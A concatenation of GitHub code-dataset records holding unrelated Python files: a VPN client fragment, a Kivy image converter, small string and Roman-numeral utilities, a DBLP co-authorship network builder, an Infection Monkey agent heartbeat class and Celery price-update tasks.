int(data[key]['bandwidth_out']) < 0 else int(data[key]['bandwidth_out'] / 1000),\n -1 if int(data[key]['bandwidth_max']) < 0 else int(data[key]['bandwidth_max'] / 1000)\n )\n\n def _on_zone_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _, x in self.zones.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.zones.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _, x in self.zones.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.zones.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _, x in self.zones.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.zones.items() if x.bandwidth_max > 0])\n )\n\n def load_configs_json(self):\n try:\n servers_data = json.loads(open(os.path.join(CONFIG_DIR, \"servers.json\"),\"r\").read())\n except Exception as e:\n self._logger.error(\"Failed to load config file: %s\" % e)\n servers_data = []\n\n for server_data in servers_data:\n vpn_server_config = VPNServerConfig()\n vpn_server_config.load(server_data)\n self.add_config(vpn_server_config)\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Planet \"%s\", %s Zones \\n' % (self.name, self.subitems.__len__())\n for key, item in self.zones.items():\n s += item.__repr__(\" \")\n return s\n","repo_name":"perfect-privacy/vpn-client","sub_path":"core/vpnconfigs/vpn_groups.py","file_name":"vpn_groups.py","file_ext":"py","file_size_in_byte":12831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"41777526817","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom kivy.app import App\r\nfrom kivy.base import Builder\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.window import Window\r\nfrom kivy.config import Config\r\nfrom kivy.properties import ObjectProperty\r\nfrom kivy.uix.spinner import Spinner\r\nfrom kivy.weakmethod import WeakMethod\r\nimport subprocess\r\nimport threading\r\nimport img2pdf\r\nimport fitz\r\nimport time\r\nimport os\r\n\r\n# コンパイル設定\r\ncwd = os.getcwd()\r\nbase_path = os.path.dirname(__file__)\r\nos.environ['Path'] = base_path\r\nos.chdir(base_path)\r\n\r\n# kivy window config\r\nos.environ ['KIVY_GL_BACKEND'] = 'angle_sdl2'\r\nWindow.size = (600, 220)\r\nConfig.set('graphics', 'resizable', 0)\r\n\r\n# ファイルパスリスト(global)\r\ninput_paths=[]\r\n\r\n\r\nclass MyLayout(Widget):\r\n item_list = ObjectProperty(None)\r\n label_text = ObjectProperty(None)\r\n input_text = ObjectProperty(None)\r\n\r\n def __init__(self, **kwargs):\r\n super(MyLayout, self).__init__(**kwargs)\r\n Clock.schedule_interval(self.my_callback, 0.7)\r\n self.add_widget(Decoration())\r\n \r\n # I/O 拡張子をループで取得\r\n def my_callback(self, dt):\r\n if len(input_paths) > 0:\r\n self.ids.input_path.text = str(input_paths)\r\n try:\r\n self.ids.output_ext.text = self.ids.item_list.text\r\n out = eval(self.ids.input_path.text)\r\n self.ids.input_ext.text = os.path.splitext(out[0])[1]\r\n except:\r\n self.ids.input_ext.text = '未入力'\r\n\r\n def change_condition(self, dt):\r\n self.ids.run_botton.disabled = False\r\n self.ids.condition.text = 'Ready'\r\n\r\n def clock_run(self):\r\n Clock.schedule_once(self.change_condition, 3)\r\n\r\n def convert(self, cmd):\r\n subprocess.run(cmd)\r\n self.ids.condition.text = 'Finished'\r\n self.clock_run()\r\n\r\n def singul_pdf_output_convert(self, out_dir, out_name, fullpath):\r\n with open(f\"{out_dir}{out_name}.pdf\",\"wb\") as f:\r\n f.write(img2pdf.convert([fullpath]))\r\n self.ids.condition.text = 'Finished'\r\n self.clock_run()\r\n\r\n def singul_pdf_input_convert(self, pages, out_dir, out_name):\r\n for page in pages:\r\n pix = page.get_pixmap()\r\n pix.save(f\"{out_dir}{out_name}_%i.png\" % (page.number+1))\r\n self.ids.condition.text = 'Finished'\r\n self.clock_run()\r\n\r\n def multi_pdf_output_convert(self, filename, out_dir, fullpath):\r\n with open(f\"{out_dir}{filename}.pdf\",\"wb\") as f:\r\n f.write(img2pdf.convert([fullpath]))\r\n self.ids.condition.text = 'Finished'\r\n self.clock_run()\r\n\r\n def multi_pdf_input_convert(self, pages, out_dir, filename):\r\n for page in pages:\r\n pix = page.get_pixmap()\r\n pix.save(f\"{out_dir}{filename}_%i.png\" % (page.number+1))\r\n time.sleep(1)\r\n self.ids.condition.text = 'Finished'\r\n self.clock_run()\r\n\r\n def run_button(self):\r\n global input_paths\r\n out_extension = self.ids.item_list.text\r\n out_dir = self.ids.output_path.text + '/'\r\n\r\n if out_extension == '選択...' :\r\n self.popup_open()\r\n return None\r\n \r\n try:\r\n fullpath = input_paths[0]\r\n path = os.path.splitext(os.path.basename(input_paths[0]))\r\n filename = path[0]\r\n input_ext = path[1]\r\n except:\r\n self.InputErrorPopupMenu()\r\n return None\r\n\r\n if input_ext not in ['.png', '.PNG', '.jpeg', '.JPEG', '.jpg', '.JPG', '.webp', '.Webp', '.WebP', '.WEBP', '.pdf', '.PDF', '.gif', '.GIF']:\r\n self.Input_EXT_ErrorPopupMenu()\r\n return None\r\n\r\n out_name = str(self.ids.out_name.text)\r\n\r\n # (error)入出力拡張子が同じ場合\r\n if input_ext == out_extension:\r\n self.popup_open2()\r\n return None\r\n\r\n if (out_extension in ['.png', '.jpeg', '.webp']) and (input_ext in ['.gif', '.GIF']):\r\n self.GIF_CONVERT_ErrorPopupMenu()\r\n return None\r\n\r\n if (out_extension in ['.jpeg', '.webp'] and (input_ext in ['.pdf', '.PDF'])):\r\n self.PDF_CONVERT_ErrorPopupMenu()\r\n return None\r\n \r\n # 出力ファイル名が未入力の場合-空文字\r\n if out_name == '':\r\n out_name = filename\r\n\r\n if out_dir == '/':\r\n out_dir = cwd + '/'\r\n \r\n self.ids.run_botton.disabled = True\r\n\r\n # 複数ファイルの場合\r\n if len(input_paths) != 1:\r\n for i in range(len(input_paths)):\r\n fullpath = input_paths[i]\r\n path = os.path.splitext(os.path.basename(input_paths[i]))\r\n filename = path[0]\r\n input_ext = path[1]\r\n\r\n # 出力がPDFの場合\r\n if (out_extension == '.pdf') or (input_ext in ['.gif', '.GIF']):\r\n th = threading.Thread(target=self.multi_pdf_output_convert, args=(filename, out_dir, fullpath))\r\n th.start()\r\n \r\n # 入力がPDFの場合\r\n elif input_ext in ['.pdf', '.PDF']:\r\n pages = fitz.open(fullpath)\r\n th = threading.Thread(target=self.multi_pdf_input_convert, args=(pages, out_dir, filename))\r\n th.start()\r\n \r\n # その他\r\n else:\r\n cmd = f'ffmpeg -y -i \\\"{fullpath}\\\" \\\"{out_dir}{filename}{out_extension}\\\"'\r\n th1 = threading.Thread(target=self.convert, args=(cmd,))\r\n th1.start()\r\n\r\n # 単一ファイルの場合\r\n else:\r\n # 出力がPDFの場合\r\n if out_extension == '.pdf' or (input_ext == ('.gif' or '.GIF')):\r\n th = threading.Thread(target=self.singul_pdf_output_convert, args=(out_dir, out_name, fullpath,))\r\n th.start()\r\n\r\n # 入力がPDFの場合\r\n elif input_ext in ['.pdf', '.PDF']:\r\n pages = fitz.open(fullpath)\r\n th = threading.Thread(target=self.singul_pdf_input_convert, args=(pages, out_dir, out_name,))\r\n th.start()\r\n \r\n else:\r\n cmd = f'ffmpeg -y -i \\\"{fullpath}\\\" \\\"{out_dir}{out_name}{out_extension}\\\"'\r\n th1 = threading.Thread(target=self.convert, args=(cmd,))\r\n th1.start()\r\n\r\n def popup_open(self):\r\n content = PopupMenu(popup_close=self.popup_close)\r\n self.popup = Popup(title='RUN ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n self.popup.open()\r\n\r\n def popup_open2(self):\r\n content = PopupMenu2(popup_close=self.popup_close)\r\n self.popup = Popup(title='EXT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n self.popup.open()\r\n\r\n def InputErrorPopupMenu(self):\r\n content = InputErrorPopupMenu(popup_close=self.popup_close)\r\n self.popup = Popup(title='INPUT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n self.popup.open()\r\n\r\n def Input_EXT_ErrorPopupMenu(self):\r\n content = Input_EXT_ErrorPopupMenu(popup_close=self.popup_close)\r\n self.popup = Popup(title='INPUT_EXT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.popup.open()\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n\r\n def PDF_CONVERT_ErrorPopupMenu(self):\r\n content = PDF_CONVERT_ErrorPopupMenu(popup_close=self.popup_close)\r\n self.popup = Popup(title='PDF_CONVERT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.popup.open()\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n\r\n def GIF_CONVERT_ErrorPopupMenu(self):\r\n content = GIF_CONVERT_ErrorPopupMenu(popup_close=self.popup_close)\r\n self.popup = Popup(title='GIF_CONVERT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n self.popup.open()\r\n self.ids.condition.text = 'Error'\r\n self.ids.run_botton.disabled = True\r\n self.clock_run()\r\n\r\n def popup_close(self):\r\n self.popup.dismiss()\r\n\r\n\r\nclass SpinnerButton(Button):\r\n pass\r\n\r\nclass PopupMenu(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass PopupMenu2(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass InputErrorPopupMenu(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass Input_EXT_ErrorPopupMenu(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass PDF_CONVERT_ErrorPopupMenu(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass GIF_CONVERT_ErrorPopupMenu(BoxLayout):\r\n popup_close = ObjectProperty(None)\r\n\r\nclass MySpinner(Spinner):\r\n option_cls = ObjectProperty(SpinnerButton)\r\n\r\nclass PathButton(Button):\r\n @staticmethod \r\n def get_path():\r\n global input_paths\r\n input_paths = []\r\n\r\n root = tk.Tk()\r\n root.withdraw()\r\n pts = filedialog.askopenfilenames()\r\n for pt in pts:\r\n input_paths.append(pt)\r\n return str(pts)\r\n\r\nclass OutPathButton(Button):\r\n @staticmethod \r\n def get_path():\r\n root = tk.Tk()\r\n root.withdraw()\r\n out_dir = filedialog.askdirectory()\r\n return out_dir\r\n\r\nclass Decoration(Widget):\r\n pass\r\n\r\n\r\nclass MyApp(App):\r\n def build(self):\r\n self.title = 'Image-Converter'\r\n # kvファイル読み込み\r\n Builder.load_file(\"img_conv.kv\")\r\n self.icon = base_path + '\\main.ico'\r\n return MyLayout()\r\n\r\nif __name__ == '__main__':\r\n MyApp().run()","repo_name":"natyosu3/ImageConverter","sub_path":"image_converter.py","file_name":"image_converter.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16702258818","text":"\nvows = ['у', 'е', 'ы', 'а', 'о', 'э', 'я', 'и', 'ю', 'ё']\ncons = ['й', 'ц', 'к', 'н', 'г', 'ш', 'щ', 'з', 'х', 'ъ', 'ф', 'в', 'п', 'р', 'л', 'д', 'ж', 'ч', 'с', 'м', 'т', 'ь', 'б']\n\n\ndef vowels(string):\n summ_vows = 0\n summ_cons = 0\n string = string.lower()\n for vow in string:\n if vow in vows:\n summ_vows += 1\n \n else:\n summ_cons += 1\n \n \n\n\n print('vows: ', summ_vows, 'cons:', summ_cons)\n return ''\n\nprint(vowels(input()))","repo_name":"medvedeva-pa/Practice_5","sub_path":"vowels.py","file_name":"vowels.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29526322628","text":"def convert_roman(number):\r\n roman=''\r\n rom_digits = [\"M\", \"CM\", \"D\", \"CD\", \"C\", \"XC\", \"L\", \"XL\", \"X\", \"IX\", \"V\", \"IV\", \"I\"]\r\n rom_digits_values = [1000,900,500,400,100,90,50,40,10,9,5,4,1]\r\n digits_amount=13\r\n for i in range(digits_amount): # apply succesive euclidian divisions to get the value of each digit weight, starting with M and finishing with I\r\n divisor = rom_digits_values[i]\r\n digits_to_add = number // divisor\r\n number = number % divisor\r\n roman = roman + digits_to_add * rom_digits[i] # progressively add letters to the string \r\n return(roman)\r\n\r\n \r\n##### TEST ##### \r\n\r\ni=int(input('Type a number : '))\r\nprint(\"The roman number is \" + convert_roman(i)) ","repo_name":"louis-lombardi/manatal-roman-numbers","sub_path":"convert_roman.py","file_name":"convert_roman.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3784515578","text":"import xml\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport io\nimport csv\nimport re\nimport configs as cfg\nimport json\nfrom operator import itemgetter\n\nconferenceTier = cfg.conferenceTier\nconferencesName = cfg.conferencesName\nconferencesRegex = cfg.conferencesRegex\n\npublicationsType = [\"article\", \"inproceedings\", \"proceedings\"]\n\npublicationKeys = [\"author\", \"title\", \"year\", \"volume\",\n \"booktitle\", \"journal\", \"crossref\", \"school\"]\n\ndataHeader = [\"publtype\", \"conftype\", \"confName\", \"key\", \"tier\", \"title\", \"year\",\n \"booktitle\", \"volume\", \"journal\",\n \"crossref\"]\n\ndictionary = {}\nconferences = {}\ninproceeds = {}\nauthorsList = {}\n\n\ndef PreprocessConferencesAuthors (dblpFileName, JSONList):\n parser = make_parser()\n parser.setFeature(xml.sax.handler.feature_namespaces, 0)\n Handler = DBLPHandler()\n parser.setContentHandler(Handler)\n print(\"PARSE1\")\n parser.parse(io.open(dblpFileName))\n\n with open(JSONList[0], 'w+') as json_file:\n json.dump(conferences, json_file)\n\n with open(JSONList[1], 'w+') as json_file:\n json.dump(authorsList, json_file)\n\n with open(JSONList[2], 'w+') as json_file:\n json.dump(inproceeds, json_file)\n\n print(\"done parsing\")\n return conferences\n\n\ndef CreateNetworks():\n conferenceInfo = ParseJSONtoDict(\"json/conferencesAndAuthors.json\")\n authorInfo = ParseJSONtoDict(\"json/authors.json\")\n inproceedsInfo = ParseJSONtoDict('json/inproceeds.json')\n print(len(conferenceInfo))\n print(len(authorInfo))\n print(len(inproceedsInfo))\n\n CreateConferenceNetwork(conferenceInfo)\n print('done conf')\n CreateAuthorNetwork(authorInfo, inproceedsInfo)\n print('done auth')\n\n\ndef CreateConferenceNetwork (conferenceInfo):\n conferenceNodes = []\n confNodeAttr = []\n confEdges = []\n for key, value in conferenceInfo.items():\n conferenceNodes.append((key, int(value['year']), value['conftype'],\n int(value['tier']), len(value['authors'])))\n\n for key1 in conferenceNodes:\n conf1 = key1[0]\n conf1year = key1[1]\n if conf1[:-4] == 'pvldb':\n conf1 = 'vldb' + conf1[-4:]\n\n confNodeAttr.append((conf1, {'size': key1[4], 'tier': key1[3], 'year': key1[1],\n 'authors': conferenceInfo[key1[0]]['authors']}))\n\n\n for key2 in conferenceNodes:\n conf2 = key2[0]\n conf2year = key2[1]\n if conf2[:-4] == 'pvldb':\n conf2 = 'vldb' + conf2[-4:]\n\n weight = 0\n if conf1 != conf2 and conf1year < conf2year:\n # can use set and intersect\n z = set(conferenceInfo[key1[0]]['authors']).intersection(set(conferenceInfo[key2[0]]['authors']))\n if key1[3] == 1:\n weight = len(z) * 3\n elif key[3] == 2:\n weight = len(z) * 2\n elif key[3] == 3:\n weight = len(z) * 1\n confEdges.append((conf1, conf2, weight))\n\n SaveNodesEdgesinJSON(confNodeAttr, confEdges,'conference')\n\n\n\ndef CreateAuthorNetwork (authorsInfo, inproceedsInfo):\n authNodes = []\n authEdges = []\n\n for author, publications in authorsInfo.items():\n reputation = 0\n prevTier1Year = 2100\n tier1cnt = 0\n publications.sort(key=itemgetter('year'))\n prevPubl = None\n success = 0\n maxSuccess = 0\n for publ in publications:\n if publ['tier'] == 1:\n reputation += 3\n elif publ['tier'] == 2:\n reputation += 2\n elif publ['tier'] == 3:\n reputation += 1\n\n\n if publ['tier'] == 1:\n if prevPubl is not None:\n if int(publ['year']) - prevTier1Year <= 1:\n success += 1\n elif int(publ['year']) - prevTier1Year > 1:\n if success > maxSuccess:\n maxSuccess = success\n success = 0\n \n tier1cnt += 1\n prevPubl = publ\n prevTier1Year = int(publ['year'])\n\n if success > maxSuccess:\n maxSuccess = success\n authNodes.append((author, {'size': len(publications), 'success': maxSuccess, 'tier1cnt': tier1cnt,\n 'reputation': reputation,\n 'start': int(publications[0]['year']),\n 'end': int(publications[len(publications)-1]['year']),\n 'publ': publications}))\n\n for key, publ in inproceedsInfo.items():\n authors = publ['authors']\n authorcheck = set()\n for author1 in authors:\n authorcheck.add(author1)\n for author2 in authors:\n if author1 != author2 and author2 not in authorcheck:\n authEdges.append((author1, author2, {'tier': int(publ['tier']), 'year':int(publ['year'])}))\n authorcheck.clear()\n\n SaveNodesEdgesinJSON(authNodes, authEdges,'author')\n\n\n# Store data into JSON\ndef SaveNodesEdgesinJSON (nodes, edges, fileName):\n with open('json/'+fileName+'Nodes.json', 'w') as json_file:\n json.dump(nodes, json_file)\n\n with open('json/'+fileName+'Edges.json', 'w') as json_file:\n json.dump(edges, json_file)\n\n# Get data from JSON\ndef ParseJSONtoDict (filename):\n # Read JSON data into the datastore variable\n if filename:\n with open(filename, 'r') as f:\n datastore = json.load(f)\n return datastore\n\n\ndef AddToConference (key, conftype, year, tier, publauthors):\n authors = publauthors.copy()\n if key not in conferences and int(year) >= 1975:\n conferences[key] = {'key': key, 'conftype': conftype, 'year': year, 'tier': tier, 'authors': authors}\n elif key in conferences:\n conferences[key]['authors'].extend(authors)\n\n\ndef AddToInproceeds (key, crossref, conftype, year, tier, publauthors):\n authors = publauthors.copy()\n if key not in inproceeds:\n inproceeds[key] = {'key': key, 'conf':crossref, 'conftype':conftype, 'year':year, 'tier':tier, 'authors':authors}\n for author in authors:\n if author not in authorsList:\n authorsList[author] = [inproceeds[key]]\n else:\n authorsList[author].append(inproceeds[key])\n\n\n\ndef AddToData (publicationData, confType, publicationAuthors):\n conftype = confType\n tier = publicationData[\"tier\"]\n year = publicationData[\"year\"]\n confname = conferencesName[confType] + \" \" + year\n crossref = publicationData[\"crossref\"].lower()\n key = publicationData[\"key\"].lower()\n conferencekey = publicationData[\"conftype\"] + publicationData[\"year\"]\n writeBool = False\n\n if publicationData[\"publtype\"] == \"inproceedings\":\n if re.search(\"^conf/[a-z]+/[0-9]{2,4}(-[1-3])?$\", crossref):\n writeBool = True\n elif publicationData[\"publtype\"] == \"article\":\n if re.search(\"^journals/pvldb/[a-zA-Z0-9]+$\", key):\n writeBool = True\n\n if writeBool:\n publicationData.update({\"confName\": confname})\n AddToInproceeds(key, conferencekey, conftype, year, tier, publicationAuthors)\n AddToConference(conferencekey, conftype, year, tier, publicationAuthors)\n\n\nclass DBLPHandler(ContentHandler):\n # variables used to check publications\n currentTypeOfConf = \"\"\n currentPublicationType = \"\"\n currentTag = \"\"\n fullContent = \"\"\n listOfContent = \"\"\n isPublication = False\n\n # publication content, use for temporary storage per publication\n currPublicationAuthors = []\n currPublicationData = {\"publtype\": \"NULL\", \"conftype\": \"NULL\", \"confName\": \"NULL\", \"key\": \"NULL\", \"tier\": \"NULL\",\n \"title\": \"NULL\", \"year\": \"NULL\",\n \"booktitle\": \"NULL\", \"volume\": \"NULL\", \"journal\": \"NULL\",\n \"crossref\": \"NULL\"}\n\n def __init__ (self):\n super().__init__()\n self.csv = CSVWriter()\n self.proceedWriter, self.inproceedWriter, self.authorWriter = self.csv.OpenCSVWriter()\n\n # Call when an element starts\n def startElement (self, tag, attrs):\n if tag == \"dblp\":\n return\n if tag in publicationsType:\n self.isPublication = True\n\n self.currentPublicationType = tag\n\n if \"key\" in attrs:\n value = attrs.get(\"key\")\n valueArray = value.split('/')\n self.currentTypeOfConf = valueArray[1].lower()\n if self.currentTypeOfConf in conferencesName:\n self.currPublicationData.update({\"tier\": conferenceTier[self.currentTypeOfConf]})\n self.currPublicationData.update({\"key\": value})\n self.currPublicationData.update({\"publtype\": tag})\n self.currPublicationData.update({\"conftype\": valueArray[1].lower()})\n\n # if inside a publication\n elif self.isPublication:\n self.currentTag = tag\n\n # Call when a character is read\n def characters (self, content):\n if self.isPublication and self.currentTypeOfConf in conferencesName and self.currentTag in publicationKeys:\n self.listOfContent += content\n\n # Call when ending tag found \n def endElement (self, tag):\n if self.listOfContent != \"\":\n self.fullContent = self.listOfContent.strip().replace(\"\\n\", \"\")\n\n if self.isPublication and self.currentTypeOfConf in conferencesName and tag in publicationKeys:\n if tag == \"author\":\n self.currPublicationAuthors.append(self.fullContent)\n else:\n self.currPublicationData.update({tag: self.fullContent})\n\n self.fullContent = \"\"\n self.listOfContent = \"\"\n\n # end of publication, i.e. found \n if tag == self.currentPublicationType:\n if self.currentTypeOfConf in conferencesName:\n if self.currentPublicationType == \"inproceedings\" or self.currentPublicationType == \"article\":\n AddToData(self.currPublicationData, self.currentTypeOfConf, self.currPublicationAuthors)\n self.resetTemporaryVariables()\n\n # end of dblp\n if tag == \"dblp\":\n self.csv.CloseCSVWriter()\n\n # reset variables after every end of publication\n def resetTemporaryVariables (self):\n self.currPublicationAuthors = []\n self.currPublicationData = {\"publtype\": \"NULL\", \"confName\": \"NULL\", \"key\": \"NULL\", \"tier\": \"NULL\",\n \"title\": \"NULL\", \"year\": \"NULL\",\n \"booktitle\": \"NULL\", \"volume\": \"NULL\", \"journal\": \"NULL\",\n \"crossref\": \"NULL\"}\n self.isPublication = False\n self.currentTypeOfConf = \"\"\n\n\n # not used\n def WriteAsProceedings (self, conf):\n publicationTitle = self.currPublicationData[\"title\"].lower()\n if self.currentTypeOfConf == \"sigmod\":\n if re.search(\"international conference on management of data\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf in [\"vldb\", \"pvldb\"]:\n if re.search(\"international conference on very large (data bases|databases)\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"kdd\":\n if re.search(\"international conference on knowledge discovery (&|and) data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"edbt\":\n if re.search(\"international conference on extending database technology\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"icde\":\n if re.search(\"international conference on data engineering\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"icdm\":\n if re.search(\"ieee(.*)international conference on data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"sdm\":\n if re.search(\"siam international conference on data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"cikm\":\n if re.search(\"conference on information and knowledge management\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/dasfaa/-<1/2/3>\n elif self.currentTypeOfConf == \"dasfaa\":\n if re.search(\"database systems for advance[ds] applications\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/pakdd/-<1/2/3>\n elif self.currentTypeOfConf == \"pakdd\":\n if re.search(\"knowledge discovery and data mining(.*)pacific-asia conference\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/pkdd/-<1/2/3>\n elif self.currentTypeOfConf == \"pkdd\":\n if re.search(\n \"(machine learning and )?knowledge discovery in databases|principles of data mining and knowledge discovery\",\n publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=2, conf/dexa/-<1/2/3>\n elif self.currentTypeOfConf == \"dexa\":\n if re.search(\"database and expert systems applications\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n# not used\nclass CSVWriter:\n def __init__ (self):\n self.inproceedWriter = None\n self.proceedWriter = None\n self.authorWriter = None\n self.writeInproceed = None\n self.writeAuthor = None\n self.writeProceed = None\n\n def OpenCSVWriter (self):\n with open('Inproceedings.csv', 'w', newline=\"\", encoding='utf-8') as self.writeInproceed, \\\n open('AuthorsInproceeding.csv', 'w', newline=\"\", encoding='utf-8') as self.writeAuthor, \\\n open('Proceedings.csv', 'w', newline=\"\", encoding='utf-8') as self.writeProceed:\n self.inproceedWriter = csv.DictWriter(self.writeInproceed, fieldnames=dataHeader)\n self.inproceedWriter.writeheader()\n\n self.proceedWriter = csv.DictWriter(self.writeProceed, fieldnames=dataHeader)\n self.proceedWriter.writeheader()\n\n self.authorWriter = csv.writer(self.writeAuthor)\n self.authorWriter.writerow([\"conference\", \"author\"])\n return self.inproceedWriter, self.proceedWriter, self.authorWriter\n\n def CloseCSVWriter (self):\n self.writeInproceed.close()\n self.writeAuthor.close()\n self.writeProceed.close()\n","repo_name":"Seannyyy/NetworkScienceProject1","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":16294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40542488722","text":"import logging\nimport time\n\nfrom common.common_consts import HEARTBEAT_INTERVAL\nfrom common.utils.code_utils import PeriodicCaller\nfrom infection_monkey.island_api_client import IIslandAPIClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass Heart:\n def __init__(self, island_api_client: IIslandAPIClient):\n self._island_api_client = island_api_client\n self._periodic_caller = PeriodicCaller(\n self._send_heartbeats, HEARTBEAT_INTERVAL, \"AgentHeart\"\n )\n\n def start(self):\n logger.info(\"Starting the Agent's heart\")\n self._periodic_caller.start()\n\n def _send_heartbeats(self):\n self._island_api_client.send_heartbeat(time.time())\n\n def stop(self):\n logger.info(\"Stopping the Agent's heart\")\n\n # Waiting HEARTBEAT_INTERVAL is more than enough time. In practice, stopping\n # self._periodic_caller should never take longer than it takes for\n # `self._island_api_client.send_heartbeat()` to timeout.\n self._periodic_caller.stop(timeout=HEARTBEAT_INTERVAL)\n","repo_name":"guardicore/monkey","sub_path":"monkey/infection_monkey/heart.py","file_name":"heart.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"9147143646","text":"import smtplib\nfrom email.header import Header\nfrom email.mime.text import MIMEText\n\nfrom celery import Celery\nfrom celery.schedules import crontab\nfrom flask_mail import Mail, Message\n\nfrom webapp import create_app\nimport price_parsers\nfrom webapp.config import SENDER, SUBJ_FOR_EMAIL\n\nflask_app = create_app()\ncelery_app = Celery('tasks', broker='redis://localhost:6379/0')\nmail = Mail(flask_app)\n\n\n@celery_app.on_after_configure.connect\ndef setup_tasks(sender, **kwargs):\n sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_megafon.s())\n sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_eldorado.s())\n sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_techport.s())\n sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_citilink.s())\n sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_mts.s())\n\n\n@celery_app.task\ndef update_prices_megafon():\n with flask_app.app_context():\n price_parsers.MegafonParser().update_db()\n\n\n@celery_app.task\ndef update_prices_eldorado():\n with flask_app.app_context():\n price_parsers.EldoradoParser().update_db()\n\n\n@celery_app.task\ndef update_prices_techport():\n with flask_app.app_context():\n price_parsers.TechportParser().update_db()\n\n\n@celery_app.task\ndef update_prices_citilink():\n with flask_app.app_context():\n price_parsers.CitilinkParser().update_db()\n\n\n@celery_app.task\ndef update_prices_mts():\n with flask_app.app_context():\n price_parsers.MtsParser().update_db()\n\n\n@celery_app.task\ndef send_mail(email, phone_name):\n with flask_app.app_context():\n msg = Message(subject=SUBJ_FOR_EMAIL, recipients=[email], sender=SENDER)\n msg.body = f'Цена на {phone_name} из Вашего избранного снизилась!'\n mail.send(msg)\n\n","repo_name":"borshchevsky/stuff_finder","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7694484384","text":"from MicroWebSrv2 import *\nfrom graphPlot import plotAndSaveGraph\nfrom graph import Graph\n\nclass 